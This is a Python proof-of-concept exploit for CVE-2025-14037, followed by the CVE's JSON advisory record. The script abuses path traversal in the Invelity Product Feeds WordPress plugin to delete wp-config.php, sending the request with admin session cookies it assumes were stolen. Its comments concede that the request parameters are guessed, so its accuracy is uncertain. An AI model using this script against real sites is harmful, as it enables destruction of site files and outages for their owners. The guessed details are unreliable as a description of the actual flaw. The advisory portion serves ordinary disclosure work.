CVE-2025-14037

import requests # CVE-2025-14037 Proof of Concept # Description: Arbitrary File Deletion via Path Traversal in Invelity Product Feeds plugin # Target: WordPress sites with Invelity Product Feeds <= 1.2.6 # The vulnerable endpoint is typically accessed via the admin panel. # This script simulates the request an admin would make when tricked into clicking a malicious link. target_url = "http://example.com/wp-admin/admin.php" # Payload to delete wp-config.php using path traversal sequences # Note: The specific parameter name (e.g., 'file', 'feed_id', 'path') depends on the plugin's implementation # derived from the 'createManageFeedPage' function. payload_params = { "page": "invelity-manage-feed-page", "action": "delete_feed", "feed_id": "../../wp-config.php" # Path traversal payload } # In a real CSRF scenario, the browser sends cookies automatically. # For this script, we assume we have captured the admin's cookies. admin_cookies = { "wordpress_logged_in_12345": "admin_session_hash_here", "wordpress_sec_12345": "secure_session_hash_here" } def exploit(): try: print("[*] Sending malicious request to delete wp-config.php...") response = requests.get(target_url, params=payload_params, cookies=admin_cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[!] Check if the target file has been deleted.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-14037", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:16:51.263", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Invelity Product Feeds plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in all versions up to, and including, 1.2.6. This is due to missing validation and sanitization in the 'createManageFeedPage' function. This makes it possible for authenticated administrator-level attackers to delete arbitrary files on the server via specially crafted requests that include path traversal sequences, granted they can trick an admin into clicking a malicious link."}, {"lang": "es", "value": "El plugin Invelity Product Feeds para WordPress es vulnerable a la eliminación arbitraria de archivos mediante salto de ruta en todas las versiones hasta e incluyendo la 1.2.6. Esto se debe a la falta de validación y saneamiento en la función 'createManageFeedPage'. Esto hace posible que atacantes autenticados con nivel de administrador eliminen archivos arbitrarios en el servidor mediante solicitudes especialmente diseñadas que incluyen secuencias de salto de ruta, siempre que puedan engañar a un administrador para que haga clic en un enlace malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "http://plugins.trac.wordpress.org/browser/invelity-products-feeds/trunk/classes/admin/classPluginSettingsManageFeedPage.php?marks=60#L60", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f95276c-7486-4dbe-a79d-702fd6be9cfa?source=cve", "source": "[email protected]"}]}}